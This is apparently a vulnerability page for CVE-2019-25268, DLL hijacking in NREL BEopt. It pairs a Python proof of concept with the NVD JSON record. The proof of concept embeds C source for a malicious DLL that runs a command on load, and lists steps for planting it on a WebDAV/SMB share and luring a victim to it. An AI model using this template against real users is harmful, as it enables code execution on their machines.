CVE-2019-25268

#!/usr/bin/env python3 # CVE-2019-25268 PoC - DLL Hijacking in NREL BEopt # This PoC demonstrates how to create a malicious DLL for exploitation import os # Malicious DLL source code (for Windows x64) dll_template = ''' #include <windows.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Create a backdoor connection or execute malicious payload WinExec("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt", SW_HIDE); // Or use system() for arbitrary command execution // system("calc.exe"); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ''' # To exploit: # 1. Create a malicious sdl2.dll or libegl.dll # 2. Host the malicious DLL on a WebDAV or SMB share # 3. Name the DLL to match what BEopt loads # 4. Social engineer victim to open a BEopt file from the remote share # 5. The malicious DLL will be loaded and executed print("CVE-2019-25268 DLL Hijacking PoC") print("Target: NREL BEopt 2.8.0.0") print("Vulnerable DLLs: sdl2.dll, libegl.dll") print("Attack vector: WebDAV/SMB share")

{"cve": {"id": "CVE-2019-25268", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:57.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. Attackers can exploit insecure library loading of sdl2.dll and libegl.dll by placing malicious libraries on WebDAV or SMB shares to execute unauthorized code."}, {"lang": "es", "value": "NREL BEopt 2.8.0.0 contiene una vulnerabilidad de secuestro de DLL que permite a los atacantes cargar bibliotecas arbitrarias engañando a los usuarios para que abran archivos de aplicación desde recursos compartidos remotos. Los atacantes pueden explotar la carga insegura de las bibliotecas sdl2.dll y libegl.dll colocando bibliotecas maliciosas en recursos compartidos WebDAV o SMB para ejecutar código no autorizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019030108", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/158065", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/152043", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20190915095657/https://beopt.nrel.gov/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5513.php", "source": "[email protected]"}]}}